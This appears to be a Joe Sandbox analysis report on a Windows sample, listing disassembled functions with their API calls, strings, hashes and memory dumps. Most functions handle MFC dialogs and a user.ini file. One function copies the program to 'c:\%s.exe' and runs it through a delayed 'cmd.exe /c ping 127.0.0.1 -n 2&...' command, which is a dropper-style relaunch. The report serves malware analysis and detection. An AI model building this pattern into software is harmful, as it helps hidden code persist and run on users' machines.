Instruction Fuzzy Hash: D7D0C9792106118FC7147F58E91DA4A7BA4EF89302B4540AAF601AB3A1CAB498408F94

Function 00404578 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7D4ED0.MFC42(?,?,?, E@,00404520,00000000,?,0000000A), ref: 00404588

Strings

E@, xrefs: 00404578

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID:
String ID: E@
API String ID: 0-1021207842
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 10c4685e4c1b6a8bdab444a1996e1c4aa9e8657ff44068a67dc80207ca276c8e
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 9AB00876018386ABDB12DF919C0192ABAA2BFD8704F484C1DB2A1101A197668438AB16

Non-executed Functions

Function 00401DE0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00401DEA
6D7D3130.MFC42 ref: 00401DFF
SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
GetSystemMetrics.USER32(0000000B), ref: 00401E29
GetSystemMetrics.USER32(0000000C), ref: 00401E2F
GetClientRect.USER32(?,?), ref: 00401E3C
DrawIcon.USER32(?,?,?,?), ref: 00401E74
6D7D30D0.MFC42 ref: 00401E7E
6D7CFEB0.MFC42 ref: 00401E8C

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: MetricsSystem$ClientD3130DrawIconIconicMessageRectSend
String ID:
API String ID: 1875806438-0
Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59

Function 00403B10 Relevance: 45.6, APIs: 25, Strings: 1, Instructions: 149
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7EE820.MFC42(00000001), ref: 00403B34
6D7E52C0.MFC42(user.ini,00000000,00000001), ref: 00403B72
6D7C7770.MFC42 ref: 00403B83
6D7C2DD0.MFC42(00000000), ref: 00403B8B
6D7C76D0.MFC42(00000000,00000000), ref: 00403B9B
6D7CEBC0.MFC42(00000000,00000000), ref: 00403BA8
6D7C8660.MFC42(00000000,00000000,00000000), ref: 00403BB2
6D7EB140.MFC42 ref: 00403BC4
6D7EA880.MFC42(?,00000000,?), ref: 00403BDF
6D7EA8D0.MFC42(?,00000000,00407070,?,00000000,?), ref: 00403BF4
6D7EA880.MFC42(?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C05
6D7EA8D0.MFC42(?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C1B
6D7C90A0.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C2A
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C37
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C45
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C53
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C61
fopen.MSVCRT ref: 00403C70
6D7CA420.MFC42(00407200,00407234,00000000), ref: 00403C88
6D7D59A0.MFC42(00407200,00407234,00000000), ref: 00403C95
fprintf.MSVCRT ref: 00403CB8
fclose.MSVCRT ref: 00403CBF
6D7ED780.MFC42(00407224,00407234,00000000), ref: 00403CD8
6D7ED780.MFC42(00407200,00407234,00000000), ref: 00403CEF
6D7ED780.MFC42(004071E0,00407234,00000000,00000001), ref: 00403D04

Strings

user.ini, xrefs: 00403B69, 00403C6B

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$D780$A880$B140C7770C8660E820fclosefopenfprintf
String ID: user.ini
API String ID: 1956544671-1338118170
Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B

Function 004036D0 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 167
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7E52C0.MFC42(user.ini,00000000), ref: 004036F9
6D7C7770.MFC42 ref: 0040370A
6D7C2DD0.MFC42(00000000), ref: 00403712
6D7C76D0.MFC42(00000000,00000000), ref: 00403722
6D7CEBC0.MFC42(00000000,00000000), ref: 0040372F
6D7C8660.MFC42(00000000,00000000,00000000), ref: 00403739
6D7D56F0.MFC42 ref: 00403747
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
6D7CEC00.MFC42(?,?,0000003B), ref: 00403778

Part of subcall function 004039A0: 6D7CA420.MFC42(00000000,00000000,00402222,?,?,0000003B), ref: 004039C4

6D7CEC00.MFC42(00000015,?,0000003B,00000001), ref: 004037A1
6D7CEC00.MFC42(?,?,0000003B,00000001,00000001), ref: 004037BF
6D7EB590.MFC42(00000021,00000001,00000000,00000001), ref: 004037D9
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404B78), ref: 004037E8
6D7CEC00.MFC42(?,00000001,0000003B,00000001), ref: 0040380C
6D7CEC00.MFC42(?,?,0000003B,00000000,00000001), ref: 0040382A
6D7CEC00.MFC42(00000019,?,0000003B,00000000,-00000001,00000001), ref: 0040384A
6D7EB590.MFC42(?,00000001,00000001), ref: 00403862
6D7C90A0.MFC42 ref: 00403871
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404B78), ref: 0040387E
SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
6D7CA420.MFC42 ref: 004038AB
6D7CA420.MFC42 ref: 004038B9
6D7D59A0.MFC42 ref: 004038CA

Strings

user.ini, xrefs: 004036F0

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$B590MessageSend$C7770C8660
String ID: user.ini
API String ID: 2938254172-1338118170
Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7

Function 00402170 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 167
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7E52C0.MFC42(user.ini,00000000), ref: 00402199
6D7C7770.MFC42 ref: 004021AA
6D7C2DD0.MFC42(00000000), ref: 004021B2
6D7C76D0.MFC42(00000000,00000000), ref: 004021C2
6D7CEBC0.MFC42(00000000,00000000), ref: 004021CF
6D7C8660.MFC42(00000000,00000000,00000000), ref: 004021D9
6D7D56F0.MFC42 ref: 004021E7
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
6D7CEC00.MFC42(?,?,0000003B), ref: 00402218

Part of subcall function 004039A0: 6D7CA420.MFC42(00000000,00000000,00402222,?,?,0000003B), ref: 004039C4

6D7CEC00.MFC42(00000015,?,0000003B,00000001), ref: 00402241
6D7CEC00.MFC42(?,?,0000003B,00000001,00000001), ref: 0040225F
6D7EB590.MFC42(00000021,00000001,00000000,00000001), ref: 00402279
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404878), ref: 00402288
6D7CEC00.MFC42(?,00000001,0000003B,00000001), ref: 004022AC
6D7CEC00.MFC42(?,?,0000003B,00000000,00000001), ref: 004022CA
6D7CEC00.MFC42(00000019,?,0000003B,00000000,-00000001,00000001), ref: 004022EA
6D7EB590.MFC42(?,00000001,00000001), ref: 00402302
6D7C90A0.MFC42 ref: 00402311
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404878), ref: 0040231E
SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
6D7CA420.MFC42 ref: 0040234B
6D7CA420.MFC42 ref: 00402359
6D7D59A0.MFC42 ref: 0040236A

Strings

user.ini, xrefs: 00402190

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$B590MessageSend$C7770C8660
String ID: user.ini
API String ID: 2938254172-1338118170
Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

Function 00403D20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7EE820.MFC42(00000001), ref: 00403D40
_mbscmp.MSVCRT ref: 00403D57
6D7ED780.MFC42(00407280,00407234,00000000), ref: 00403D72
6D7E52C0.MFC42(user.ini,00000000), ref: 00403D93
6D7C7770.MFC42 ref: 00403DA4
6D7C2DD0.MFC42(00000000), ref: 00403DAC
6D7C76D0.MFC42(00000000,00000000,00000000), ref: 00403DBC
6D7CEBC0.MFC42(00000000,00000000,00000000), ref: 00403DC9
6D7C8660.MFC42(00000000,00000000,00000000,00000000), ref: 00403DD3
6D7EB140.MFC42 ref: 00403DE4
6D7ED780.MFC42(0040725C,00407234,00000000), ref: 00403E00
6D7CA420.MFC42 ref: 00403EA2
6D7D59A0.MFC42 ref: 00403EAF

Strings

user.ini, xrefs: 00403D8A, 00403E32

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D780$A420B140C7770C8660E820_mbscmp
String ID: user.ini
API String ID: 2834624945-1338118170
Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB

Function 004019C0 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 100
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D800310.MFC42(00000066,00000000,?,?,?,?,?,00000000,004047CD,000000FF,004016EF,00000000), ref: 004019E7
6D7C7F20.MFC42(00000066,00000000), ref: 004019F9
6D7C7F20.MFC42(00000066,00000000), ref: 00401A11
6D7C7F20.MFC42(00000066,00000000), ref: 00401A29
6D7C7F20.MFC42(00000066,00000000), ref: 00401A41
6D7C7F20.MFC42(00000066,00000000), ref: 00401A59
6D7C7F20.MFC42(00000066,00000000), ref: 00401A71
6D7C7F20.MFC42(00000066,00000000), ref: 00401A89
6D7D56F0.MFC42(00000066,00000000), ref: 00401AA1
6D7D56F0.MFC42(00000066,00000000), ref: 00401AB3
6D7D56F0.MFC42(00000066,00000000), ref: 00401AC3
6D7D56F0.MFC42(00000066,00000000), ref: 00401AD5
6D7D56F0.MFC42(00000066,00000000), ref: 00401AE5
6D7D5A80.MFC42(004073FC,00000066,00000000), ref: 00401AFC
6D7D5A80.MFC42(004073FC,004073FC,00000066,00000000), ref: 00401B08
6D7D5A80.MFC42(004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B14
6D7D5A80.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B24
6D7C50F0.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B29
6D7CF390.MFC42(00000080,0000000E,00000080,004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B3A
LoadIconA.USER32(00000000,00000080), ref: 00401B40

Strings

0?@, xrefs: 00401A8E
nB@, xrefs: 00401A76
DB@, xrefs: 00401AF6

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: D800310F390IconLoad
String ID: 0?@$DB@$nB@
API String ID: 487667375-169237758
Opcode ID: 61283f7cb8a9a505548b534a433f2e0d23e54d829050f8b43b38edcd8d41ae24
Instruction ID: f2e10ca964a3f428014d6b156628cc8ca48279fbad35800b64bcb403419e067a
Opcode Fuzzy Hash: 61283f7cb8a9a505548b534a433f2e0d23e54d829050f8b43b38edcd8d41ae24
Instruction Fuzzy Hash: 80413AB1308B418BD301EF65844576EBBD1EFC9344F04486EF996272C2DBBD65098FAA

Function 00401220 Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 136
sleepfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7C2DD0.MFC42(00100000), ref: 0040122F
__p___argv.MSVCRT ref: 00401253

Part of subcall function 00401140: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B

__p___argv.MSVCRT ref: 00401274

Part of subcall function 00401140: ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 004011C2
Part of subcall function 00401140: CloseHandle.KERNEL32(00000000), ref: 004011FD

Sleep.KERNEL32(00000064), ref: 00401286
GetTickCount.KERNEL32 ref: 004012CD
wsprintfA.USER32 ref: 004012EA
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
6D7C2DD0.MFC42(00000000), ref: 00401313
Sleep.KERNEL32(00000064), ref: 00401321
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
Sleep.KERNEL32(00000064), ref: 00401339
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401349
CloseHandle.KERNEL32(00000000), ref: 00401350
6D7C2C70.MFC42(?), ref: 00401357
6D7C2C70.MFC42(00000000,?), ref: 0040135D
__p___argv.MSVCRT ref: 0040137D
wsprintfA.USER32 ref: 0040139A
WinExec.KERNEL32(?,00000000), ref: 004013AD
Sleep.KERNEL32(000001F4,?,?,?,?,00000000,?), ref: 004013B8
ExitProcess.KERNEL32 ref: 004013BC

Strings

c:\%s.exe, xrefs: 004012DE
cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
API String ID: 529022016-1443030469
Opcode ID: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
Opcode Fuzzy Hash: b0d82628c8d42d29bb42b0dbe05b30571f89d42255fb0a6e4ee7a3c0e0fd351b
Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA

Function 00402710 Relevance: 22.6, APIs: 15, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D8098C0.MFC42(000003EF), ref: 0040272F
6D8098C0.MFC42(000003EF,000003EF), ref: 00402745
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
6D8098C0.MFC42(000003F0), ref: 00402771
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
6D8098C0.MFC42(000003F0), ref: 004027A6
6D8098C0.MFC42(000003F0,000003F0), ref: 004027BC
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
6D8098C0.MFC42(000003EF), ref: 004027E8
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
6D800FC0.MFC42(?), ref: 00402810

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: MessageSend$D8098$D800
String ID:
API String ID: 38505941-0
Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55

Function 00402440 Relevance: 21.1, APIs: 14, Instructions: 98
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040246C
6D7D56F0.MFC42 ref: 00402478
6D7FBFA0.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402491
6D7CEC00.MFC42(?,?,00000020,00000001,00000000,?,?,?,?,?,?,?,?,?,?,004048C8), ref: 004024A6

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 004023BE

6D7EB590.MFC42(?,00000000,00000000), ref: 004024BF
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024D0
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024DE
6D7CEC00.MFC42(?,00000000,00000020,00000001,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024FA

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 00402403

6D7CEC00.MFC42(?,?,00000020,00000001,?), ref: 0040251A

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 00402426

6D7EB590.MFC42(?,00000001), ref: 00402532
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402543
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402551
6D7EE820.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 0040255A

Part of subcall function 00402850: CoInitialize.OLE32(00000000), ref: 0040286D
Part of subcall function 00402850: 6D7CEC00.MFC42(?), ref: 004028AF
Part of subcall function 00402850: 6D7CEC00.MFC42 ref: 004028C7
Part of subcall function 00402850: CoUninitialize.OLE32 ref: 004028E3

6D7CA420.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402572

Memory Dump Source

Source File: 0000000A.00000002.1308430064.0000000000401000.00000080.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1308414133.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308470891.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308487146.0000000000406000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308503292.0000000000407000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308537242.0000000000408000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308651027.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308698549.0000000000415000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1308790325.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_nfxboms.jbxd

Similarity

API ID: A420$B590$E820InitializeMessageSendUninitialize
String ID:
API String ID: 567275389-0
